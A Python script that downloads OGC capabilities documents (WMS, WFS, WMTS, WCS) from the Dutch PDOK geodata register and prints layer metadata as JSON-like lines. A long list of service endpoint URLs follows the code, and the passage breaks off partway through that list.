from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from xml.dom.minidom import parse, parseString
import urllib.request, urllib.parse, urllib.error
import re
def childNodeValue(node, childName):
nodes = node.getElementsByTagName(childName)
if len(nodes)==1 and nodes[0].hasChildNodes():
return nodes[0].childNodes[0].nodeValue
if len(nodes)>1:
arr = u''
for child in nodes:
# extra check, we only want direct children
if child.parentNode.nodeName==node.nodeName and child.hasChildNodes():
arr+=(child.childNodes[0].nodeValue)
arr+=','
return arr.rstrip(',')
return ""
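# A hedged worked example (XML is illustrative): for a node parsed from
# '<a><b>x</b><b>y</b></a>', childNodeValue(node, 'b') returns 'x,y'
# (direct children joined by commas); a single child returns its text and
# a missing child returns ''.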
def handleWCS(wcscapsurl):
dom = parse(urllib.request.urlopen(wcscapsurl))
#dom = parse(urllib.urlopen('http://geodata.nationaalgeoregister.nl/ahn25m/wcs?request=getcapabilities'))
contents = dom.getElementsByTagName('wcs:Contents')[0]
url = ''
for subelement in dom.getElementsByTagName('ows:Operation'):
if subelement.getAttribute('name')=='GetCoverage':
url = subelement.getElementsByTagName('ows:Get')[0].getAttribute('xlink:href')
global firstOne
comma = ''
servicetitle = childNodeValue(dom.getElementsByTagName('ows:ServiceIdentification')[0], 'ows:Title')
for coverage in contents.getElementsByTagName('wcs:CoverageSummary'):
title = childNodeValue(coverage, 'ows:Title')
layername = childNodeValue(coverage, 'wcs:Identifier')
abstract = childNodeValue(coverage, 'ows:Abstract')
try:
if not firstOne:
comma = ','
# some extract have strange chars, we decode to utf8
s = str('\n%s{"type":"wcs","title":"%s","abstract":"%s","url":"%s","layers":"%s","servicetitle":"%s"}' % (comma, title, abstract, url, layername, servicetitle)).encode('utf8')
# the comma behind the print makes print NOT add a \n newline behind it
# from: http://stackoverflow.com/questions/3249524/print-in-one-line-dynamically-python
# fix_print_with_import
print(s.decode('utf-8'), end=' ')
firstOne=False
except Exception as e:
#pass
# fix_print_with_import
print("\n\nError!! In layer: %s" % layername)
# fix_print_with_import
print(e)
return
def handleWFS(wfscapsurl):
#dom = parse(urllib.urlopen(wmscapsurl))
# ^^ that is not working for some wicked cbs caps with coördinaat in it...
# hack: read string and find replace coördinaat with coordinaat
response = urllib.request.urlopen(wfscapsurl)
#response = urllib.urlopen('problem.xml')
string = response.read()
# cbs vierkanten
#string = re.sub(r"co.{1,2}rdin","coordin", string)
# rdinfo
#string = re.sub(r"<WFS_Capabilities","\n<WFS_Capabilities", string)
#print string
#return
dom = parseString(string)
#dom = parse(urllib.urlopen('http://geodata.nationaalgeoregister.nl/ahn25m/wfs?version=1.0.0&request=GetCapabilities'))
#dom = parse(urllib.urlopen('http://geodata.nationaalgeoregister.nl/bagviewer/wfs?request=getcapabilities'))
global firstOne
# some services run WFS 1.0.0 while others run 2.0.0
servicetitle = ''
if len(dom.getElementsByTagName('Service'))>0:
servicetitle = childNodeValue(dom.getElementsByTagName('Service')[0], 'Title')
elif len(dom.getElementsByTagName('ows:ServiceIdentification'))>0:
servicetitle = childNodeValue(dom.getElementsByTagName('ows:ServiceIdentification')[0], 'ows:Title')
# servicetitle can have newlines in it sometimes, which create havoc in json
servicetitle = servicetitle.replace('\r', '')
servicetitle = servicetitle.replace('\t', ' ')
servicetitle = servicetitle.replace('\n', ' ')
featuretypes = dom.getElementsByTagName('FeatureType')
for featuretype in featuretypes:
layername = childNodeValue(featuretype, 'Name')
title = childNodeValue(featuretype, 'Title')
# title can have newlines in it sometimes, which create havoc in json
title = title.replace('\r', '')
title = title.replace('\t', ' ')
title = title.replace('\n', ' ')
abstract = childNodeValue(featuretype, 'Abstract')
# abstract can have newlines in it, which create havoc in json
# because we only use abstract in html, we make <br/> of them
abstract = abstract.replace('\r', '')
abstract = abstract.replace('\t', ' ')
abstract = abstract.replace('\n', '<br/>')
url = wfscapsurl
comma = ''
try:
if not firstOne:
comma = ','
# some extract have strange chars, we decode to utf8
s = str('\n%s{"type":"wfs","title":"%s","abstract":"%s","url":"%s","layers":"%s","servicetitle":"%s"}' % (comma, title, abstract, url, layername, servicetitle)).encode('utf8')
# the comma behind the print makes print NOT add a \n newline behind it
# from: http://stackoverflow.com/questions/3249524/print-in-one-line-dynamically-python
# fix_print_with_import
print(s.decode('utf-8'), end=' ')
firstOne=False
except Exception as e:
#pass
# fix_print_with_import
print("\n\nError!! In layer: %s" % layername)
# fix_print_with_import
print(e)
return
def handleWMTS(wmtscapsurl):
#dom = parse("wmts-getcapabilities_1.0.0.xml")
dom = parse(urllib.request.urlopen(wmtscapsurl))
#dom = parse(urllib.urlopen('http://geodata.nationaalgeoregister.nl/wmts?VERSION=1.0.0&request=GetCapabilities'))
#dom = parse(urllib.urlopen('http://geodata1.nationaalgeoregister.nl/luchtfoto/wmts/1.0.0/WMTSCapabilities.xml'))
#url = dom.getElementsByTagName('ows:ProviderSite')[0].getAttribute('xlink:href')
url = wmtscapsurl
servicetitle = dom.getElementsByTagName('ows:ServiceIdentification')[0].getElementsByTagName('ows:Title')[0].childNodes[0].nodeValue
contents = dom.getElementsByTagName('Contents')[0]
global firstOne
for layer in contents.getElementsByTagName('Layer'):
title = childNodeValue(layer, 'ows:Title')
layername = childNodeValue(layer, 'ows:Identifier')
imgformats = childNodeValue(layer, 'Format')
tilematrixsets = childNodeValue(layer, 'TileMatrixSet')
# wmts does not have any kind of abstract or description :-(
abstract = ''
# {"naam":"WMTS Agrarisch Areaal Nederland","url":"http://geodata.nationaalgeoregister.nl/tiles/service/wmts/aan","layers":["aan"],"type":"wmts","pngformaat":"image/png"},
comma = ''
try:
if not firstOne:
comma = ','
# some extract have strange chars, we decode to utf8
s = str('\n%s{"type":"wmts","title":"%s","abstract":"%s","url":"%s","layers":"%s","imgformats":"%s","tilematrixsets":"%s","servicetitle":"%s"}' % (comma, title, abstract, url, layername, imgformats, tilematrixsets, servicetitle)).encode('utf8')
# the comma behind the print makes print NOT add a \n newline behind it
# from: http://stackoverflow.com/questions/3249524/print-in-one-line-dynamically-python
# fix_print_with_import
print(s.decode('utf-8'), end=' ')
firstOne = False
except Exception as e:
#pass
# fix_print_with_import
print("\n\nError!! In layer: %s" % layername)
# fix_print_with_import
print(e)
return
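# Shape of one JSON object emitted above (field values are illustrative,
# following the format string in the try block):
# {"type":"wmts","title":"...","abstract":"","url":"...","layers":"...",
#  "imgformats":"image/png,image/jpeg","tilematrixsets":"EPSG:28992",
#  "servicetitle":"..."}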
def handleWMS(wmscapsurl):
#dom = parse("wms-getcapabilities_1.3.0.xml")
#dom = parse("wms_cbs.xml")
#dom = parse("problem.xml")
#dom = parse(urllib.urlopen('http://geodata.nationaalgeoregister.nl/cbsvierkanten100m/wms?request=GetCapabilities'))
#dom = parse(urllib.urlopen(wmscapsurl))
# ^^ that is not working for some wicked cbs caps with coördinaat in it...
# hack: read string and find replace coördinaat with coordinaat
response = urllib.request.urlopen(wmscapsurl)
string = response.read()
#string = re.sub(r"co.+rdin","coordin", str(string))
#print(string)
dom = parseString(string)
cap = dom.getElementsByTagName('Capability')
getmap = cap[0].getElementsByTagName('GetMap');
url = getmap[0].getElementsByTagName('OnlineResource')[0].getAttribute('xlink:href')
imgformats = childNodeValue(getmap[0], 'Format')
servicetitle = childNodeValue(dom.getElementsByTagName('Service')[0], 'Title')
global firstOne
root = dom.getElementsByTagName('Layer')[0]
for layer in root.getElementsByTagName('Layer'):
#print(layer)
# extra check: if this is again a grouping layer, skip it
# actually needed for habitatrichtlijn layers
if len(layer.getElementsByTagName('Layer'))>1:
#print('PASSING?')
pass
else:
title = childNodeValue(layer, 'Title')
# title can have newlines in it sometimes, which create havoc in json
title = title.replace('\r', '')
title = title.replace('\t', ' ')
title = title.replace('\n', ' ')
#print '|'
#print(title)
layername = childNodeValue(layer, 'Name')
abstract = childNodeValue(layer, 'Abstract')
maxscale = childNodeValue(layer, 'MaxScaleDenominator')
minscale = childNodeValue(layer, 'MinScaleDenominator')
#meta = layer.getElementsByTagName('MetadataURL')
#if meta != None:
# print "URL%s"%meta[0].getElementsByTagName('OnlineResource')[0].getAttribute('xlink:href')
# abstract can have newlines in it, which create havoc in json
# because we only use abstract in html, we make <br/> of them
abstract = abstract.replace('\r', '')
abstract = abstract.replace('\t', ' ')
abstract = abstract.replace('\n', '<br/>')
comma = ''
handled = False
for style in layer.getElementsByTagName('Style'):
styleName = childNodeValue(style, 'Name')
try:
if not firstOne:
comma = ','
# some extract have strange chars, we decode to utf8
s = str('\n%s{"type":"wms","title":"%s","abstract":"%s","url":"%s","layers":"%s","minscale":"%s","maxscale":"%s","servicetitle":"%s","imgformats":"%s", "style":"%s"}' % (comma, title, abstract, url, layername, minscale, maxscale, servicetitle, imgformats, styleName)).encode('utf8')
# the comma behind the print makes print NOT add a \n newline behind it
# from: http://stackoverflow.com/questions/3249524/print-in-one-line-dynamically-python
# fix_print_with_import
print(s.decode('utf-8'), end=' ')
firstOne = False
handled = True
except Exception as e:
#pass
# fix_print_with_import
print("\n\nError!! In layer: %s" % layername)
# fix_print_with_import
print(e)
return
if not handled:
# ouch, apparently no styles??? (eg luchtfoto wms's)
if not firstOne:
comma = ','
s = str(
'\n%s{"type":"wms","title":"%s","abstract":"%s","url":"%s","layers":"%s","minscale":"%s","maxscale":"%s","servicetitle":"%s","imgformats":"%s", "style":"%s"}' % (
comma, title, abstract, url, layername, minscale, maxscale, servicetitle, imgformats, '')).encode('utf8')
# the comma behind the print makes print NOT add a \n newline behind it
# from: http://stackoverflow.com/questions/3249524/print-in-one-line-dynamically-python
# fix_print_with_import
print(s.decode('utf-8'), end=' ')
firstOne = False
# services as listed at https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/
services = [
# all WMTS layers (except luchtfoto) live in a single service;
# there is thus no point in using the individual WMTS URLs from the overview, since they all return the capabilities below
('wmts', 'Luchtfoto Beeldmateriaal / PDOK 25 cm RGB (WMTS | Open)', 'https://geodata.nationaalgeoregister.nl/luchtfoto/rgb/wmts?request=GetCapabilities&service=WMTS'),
('wmts', 'Luchtfoto Beeldmateriaal / PDOK 25 cm Infrarood (WMTS | Open)', 'https://geodata.nationaalgeoregister.nl/luchtfoto/infrarood/wmts?request=GetCapabilities&service=WMTS'),
('wmts', 'PDOK overige services', 'https://geodata.nationaalgeoregister.nl/wmts?VERSION=1.0.0&request=GetCapabilities'),
# NOTE NOTE: the following layers are present in the WMTS capabilities but must be removed:
# brkpilot
# brkgeo
# gbkn
# kadastralekaart_intern
# and removed because they are no longer valid:
# kadastralekaartv2
# luchtfoto
# and opentopo moved up among the WMTS entries next to brt (JW), AND image/jpeg removed (PDOK bug!)
# and 2016_ortho25 and 2016_ortho25IR removed
# 7570 layers
# 8645 layers!!
#
# WMS and WFS:
# Administratieve Eenheden (INSPIRE geharmoniseerd)
# BAG Terugmeldingen
# CBS Wijken en Buurten 2017
# Geluidskaarten Schiphol
# Geluidskaarten spoorwegen
# Geografische Namen (INSPIRE geharmoniseerd)
# Geomorfologischekaart 1:50.000
# Transport Netwerken - Kabelbanen (INSPIRE geharmoniseerd)
# Vervoersnetwerken - Waterwegen (INSPIRE geharmoniseerd)
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/a
('wms', 'AHN1 (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn1/wms?service=wms&request=getcapabilities'),
('wfs', 'AHN1 (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn1/wfs?version=1.0.0&request=GetCapabilities'),
('wcs', 'AHN1 (WCS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn1/wcs?request=getcapabilities&SERVICE=WCS&VERSION=1.1.1'),
('wms', 'AHN2 (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn2/wms?service=wms&request=getcapabilities'),
('wfs', 'AHN2 (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn2/wfs?version=1.0.0&request=GetCapabilities'),
('wcs', 'AHN2 (WCS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn2/wcs?request=getcapabilities&SERVICE=WCS&VERSION=1.1.1'),
('wms', 'AHN3 (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn3/wms?request=GetCapabilities'),
('wfs', 'AHN3 (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn3/wfs?request=GetCapabilities'),
('wcs', 'AHN3 (WCS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn3/wcs?request=GetCapabilities&SERVICE=WCS&VERSION=1.1.1'),
('wms', 'Administratieve Eenheden (INSPIRE geharmoniseerd) (WMS | Open)','https://geodata.nationaalgeoregister.nl/inspire/au/wms?&request=GetCapabilities&service=WMS'),
('wfs', 'Administratieve Eenheden (INSPIRE geharmoniseerd) (WFS | Open)','https://geodata.nationaalgeoregister.nl/inspire/au/wfs?&request=GetCapabilities&service=WFS'),
('wms', 'Adressen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/inspireadressen/wms?SERVICE=WMS&request=GetCapabilities'),
('wfs', 'Adressen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/inspireadressen/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Adressen (INSPIRE geharmoniseerd) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/inspire/ad/wms?request=GetCapabilities'),
('wfs', 'Adressen (INSPIRE geharmoniseerd) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/inspire/ad/wfs?request=GetCapabilities'),
('wms', 'AAN (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/aan/wms?request=GetCapabilities'),
('wfs', 'AAN (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/aan/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Asbest scholenkaart (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/asbestscholenkaart/wms?request=GetCapabilities '),
('wfs', 'Asbest scholenkaart (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/asbestscholenkaart/wfs?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/b
('wfs', 'BAG (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bag/wfs?request=GetCapabilities'),
('wms', 'BAG (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bag/wms?request=GetCapabilities'),
('wms', 'BAG Terugmeldingen (WMS | Open)','https://geodata.nationaalgeoregister.nl/bagterugmeldingen/wms?request=GetCapabilities'),
('wfs', 'BAG Terugmeldingen (WFS | Open)','https://geodata.nationaalgeoregister.nl/bagterugmeldingen/wfs?request=GetCapabilities'),
('wms', 'Basisregistratie Gewaspercelen (BRP) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/brpgewaspercelen/wms?request=GetCapabilities'),
('wfs', 'Basisregistratie Gewaspercelen (BRP) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/brpgewaspercelen/wfs?version=1.0.0&request=GetCapabilities'),
('wfs', 'Bekendmakingen (WFS | Open)', 'http://geozet.koop.overheid.nl/wfs?version=1.0.0&request=GetCapabilities'),
# BGT layers are all WMTS services...
('wms', 'Beschermde natuurmonumenten (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/beschermdenatuurmonumenten/ows?service=wms&request=getcapabilities'),
('wfs', 'Beschermde natuurmonumenten (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/beschermdenatuurmonumenten/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Bestuurlijke grenzen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bestuurlijkegrenzen/wms?&Request=getcapabilities'),
('wfs', 'Bestuurlijke grenzen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bestuurlijkegrenzen/wfs?version=1.0.0&request=GetCapabilities'),
# in the general WMTS caps: ('wmts', 'BRP Gewaspercelen (WMTS | Open) ', 'http://geodata.nationaalgeoregister.nl/wmts/brtachtergrondkaart?VERSION=1.0.0&request=GetCapabilities') ,
# in the general WMTS caps: ('wmts', 'BRT achtergrondkaart (WMTS | Open) ', 'http://geodata.nationaalgeoregister.nl/wmts/brtachtergrondkaart?VERSION=1.0.0&request=GetCapabilities') ,
('wms', 'BGT Terugmeldingen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bgtterugmeldingen/wms?request=GetCapabilities'),
('wfs', 'BGT Terugmeldingen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bgtterugmeldingen/wfs?request=GetCapabilities'),
('wms', 'Bodemkaart 1:50.000 (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bodemkaart50000/wms?request=getCapabilities'),
('wfs', 'Bodemkaart 1:50.000 (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bodemkaart50000/wfs?request=getCapabilities'),
('wms', 'BRT Terugmeldingen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/brtterugmeldingen/wms?request=GetCapabilities'),
('wfs', 'BRT Terugmeldingen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/brtterugmeldingen/wms?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/c
('wms', 'CBS Aardgas- en elektriciteitslevering (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/cbsenergieleveringen/wms?request=GetCapabilities'),
('wfs', 'CBS Aardgas- en elektriciteitslevering (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/cbsenergieleveringen/wfs?request=GetCapabilities'),
('wms', 'CBS Bestand Bodemgebruik 2008 (BBG 2008) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bestandbodemgebruik2008/wms?request=getcapabilities') ,
('wfs', 'CBS Bestand Bodemgebruik 2008 (BBG 2008) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bestandbodemgebruik2008/wfs?version=1.0.0&request=GetCapabilities') ,
('wms', 'CBS Bestand Bodemgebruik 2010 (BBG 2010) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bestandbodemgebruik2010/wms?service=wms&request=getcapabilities') ,
('wfs', 'CBS Bestand Bodemgebruik 2010 (BBG 2010) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bestandbodemgebruik2010/wfs?version=1.0.0&request=GetCapabilities') ,
('wms', 'CBS Bestand Bodemgebruik 2012 (BBG 2012) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bestandbodemgebruik2012/wms?service=wms&request=getcapabilities') ,
('wfs', 'CBS Bestand Bodemgebruik 2012 (BBG 2012) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bestandbodemgebruik2012/wfs?version=1.0.0&request=GetCapabilities') ,
('wms', 'CBS Bevolkingskernen 2008 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/bevolkingskernen2008/wms?request=getcapabilities') ,
('wfs', 'CBS Bevolkingskernen 2008 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/bevolkingskernen2008/wfs?version=1.0.0&request=GetCapabilities') ,
('wms', 'CBS Bevolkingskernen 2011 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/bevolkingskernen2011/wms?request=getcapabilities') ,
('wfs', 'CBS Bevolkingskernen 2011 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/bevolkingskernen2011/wfs?version=1.0.0&request=GetCapabilities') ,
('wms', 'CBS Gebiedsindelingen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/cbsgebiedsindelingen/wms?request=GetCapabilities'),
('wfs', 'CBS Gebiedsindelingen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/cbsgebiedsindelingen/wfs?request=GetCapabilities'),
('wms', 'CBS Gebiedsindelingen (INSPIRE geharmoniseerd) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/su-vector/wms?&request=GetCapabilities'),
('wfs', 'CBS Gebiedsindelingen (INSPIRE geharmoniseerd) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/inspire/su-vector/wfs?&request=GetCapabilities'),
('wms', 'CBS Provincies (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/cbsprovincies/wms?request=GetCapabilities') ,
('wfs', 'CBS Provincies (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/cbsprovincies/wfs?request=GetCapabilities') ,
('wms', 'CBS Vierkantstatistieken 100m (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/cbsvierkanten100mv2/wms?request=GetCapabilities') ,
('wfs', 'CBS Vierkantstatistieken 100m (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/cbsvierkanten100mv2/wfs?request=GetCapabilities') ,
('wms', 'CBS Vierkantstatistieken 500m (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/cbsvierkanten500mv2/wms?request=GetCapabilities') ,
('wfs', 'CBS Vierkantstatistieken 500m (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/cbsvierkanten500mv2/wfs?request=GetCapabilities') ,
('wms', 'CBS Wijken en Buurten 2009 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2009/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2009 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2009/wfs?version=1.0.0&request=getcapabilities') ,
('wms', 'CBS Wijken en Buurten 2010 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2010/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2010 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2010/wfs?version=1.0.0&request=getcapabilities') ,
('wms', 'CBS Wijken en Buurten 2011 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2011/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2011 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2011/wfs?version=1.0.0&request=getcapabilities') ,
('wms', 'CBS Wijken en Buurten 2012 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2012/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2012 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2012/wfs?version=1.0.0&request=getcapabilities') ,
('wms', 'CBS Wijken en Buurten 2013 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2013/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2013 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2013/wfs?version=1.0.0&request=getcapabilities') ,
('wms', 'CBS Wijken en Buurten 2014 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2014/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2014 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2014/wfs?version=1.0.0&request=getcapabilities'),
('wms', 'CBS Wijken en Buurten 2015 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2015/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2015 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2015/wfs?version=1.0.0&request=getcapabilities'),
('wms', 'CBS Wijken en Buurten 2016 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2016/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2016 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2016/wfs?version=1.0.0&request=getcapabilities'),
('wms', 'CBS Wijken en Buurten 2017 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2017/wms?request=GetCapabilities') ,
('wfs', 'CBS Wijken en Buurten 2017 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2017/wfs?request=GetCapabilities'),
('wms', 'Cultuurhistorisch GIS (CultGIS) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/cultgis/wms?SERVICE=WMS&request=GetCapabilities') ,
('wfs', 'Cultuurhistorisch GIS (CultGIS) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/cultgis/wfs?version=1.0.0&request=GetCapabilities') ,
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/d
('wms', 'Digitaal Topografisch Bestand (DTB) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/digitaaltopografischbestand/wms?SERVICE=WMS&request=GetCapabilities'),
('wfs', 'Digitaal Topografisch Bestand (DTB) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/digitaaltopografischbestand/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Drone no-fly zone (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/dronenoflyzones/wms?request=GetCapabilities'),
('wfs', 'Drone no-fly zone (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/dronenoflyzones/wfs?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/e
('wms', 'Ecotopen (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/ecotopen/wms?request=GetCapabilities') ,
('wfs', 'Ecotopen (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/ecotopen/wfs?request=GetCapabilities') ,
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/f
('wms', 'Fietsknooppunten (WMS | Open)','https://geodata.nationaalgeoregister.nl/fietsknooppuntennetwerk/wms?request=GetCapabilities'),
('wms', 'Fysisch Geografische Regio’s (WMS | Open)','https://geodata.nationaalgeoregister.nl/fysischgeografischeregios/wms?request=GetCapabilities'),
('wfs', 'Fysisch Geografische Regio’s (WFS | Open)','https://geodata.nationaalgeoregister.nl/fysischgeografischeregios/wfs?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/g
('wms' , 'Gebouwen (INSPIRE geharmoniseerd) (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/inspire/bu/wms?request=GetCapabilities') ,
('wfs' , 'Gebouwen (INSPIRE geharmoniseerd) (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/inspire/bu/wfs?request=GetCapabilities') ,
('wms' , 'Geluidskaarten Rijkswegen (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/rwsgeluidskaarten/wms?request=GetCapabilities') ,
('wfs' , 'Geluidskaarten Rijkswegen (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/rwsgeluidskaarten/wfs?request=GetCapabilities') ,
('wms', 'Geluidskaarten Schiphol WMS (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/geluidskaartenschiphol/wms?request=GetCapabilities') ,
('wfs', 'Geluidskaarten Schiphol WFS (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/geluidskaartenschiphol/wfs?request=GetCapabilities'),
('wms', 'Geluidskaarten spoorwegen WMS (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/geluidskaartenspoorwegen/wms?request=GetCapabilities') ,
('wfs', 'Geluidskaarten spoorwegen WFS (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/geluidskaartenspoorwegen/wfs?request=GetCapabilities'),
('wms', 'Geografische Namen (INSPIRE geharmoniseerd) (WMS | Open)', 'http://geodata.nationaalgeoregister.nl/inspire/gn/wms?&request=GetCapabilities'),
('wfs', 'Geografische Namen (INSPIRE geharmoniseerd) (WFS | Open)', 'http://geodata.nationaalgeoregister.nl/inspire/gn/wfs?&request=GetCapabilities'),
('wms', 'Geomorfologischekaart 1:50.000 (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/geomorfologischekaart50000/wms?request=GetCapabilities'),
('wfs', 'Geomorfologischekaart 1:50.000 (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/geomorfologischekaart50000/wfs?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/h
('wms', 'Habitatrichtlijn verspreiding van habitattypen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/habitatrichtlijnverspreidinghabitattypen/wms?request=getcapabilities'),
('wfs', 'Habitatrichtlijn verspreiding van habitattypen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/habitatrichtlijnverspreidinghabitattypen/wfs?request=getcapabilities'),
('wms', 'Habitatrichtlijn verspreiding van soorten (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/habitatrichtlijnverspreidingsoorten/wms?request=GetCapabilities'),
('wfs', 'Habitatrichtlijn verspreiding van soorten (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/habitatrichtlijnverspreidingsoorten/wfs?request=GetCapabilities'),
('wms', 'Historische Rivierkaarten (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/historischerivierkaarten/wms?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/i
('wms', 'Indicatieve aandachtsgebieden funderingsproblematiek (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/indgebfunderingsproblematiek/wms?&request=GetCapabilities') ,
('wfs', 'Indicatieve aandachtsgebieden funderingsproblematiek (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/indgebfunderingsproblematiek/wfs?&request=GetCapabilities') ,
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/k
('wms' , 'Kadastrale Kaart v3 (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/kadastralekaartv3/wms?request=GetCapabilities') ,
('wfs' , 'Kadastrale Kaart v3 (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/kadastralekaartv3/wfs?request=GetCapabilities'),
('wms' , 'Kadastrale Percelen (INSPIRE geharmoniseerd) (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/inspire/cp/wms?request=GetCapabilities') ,
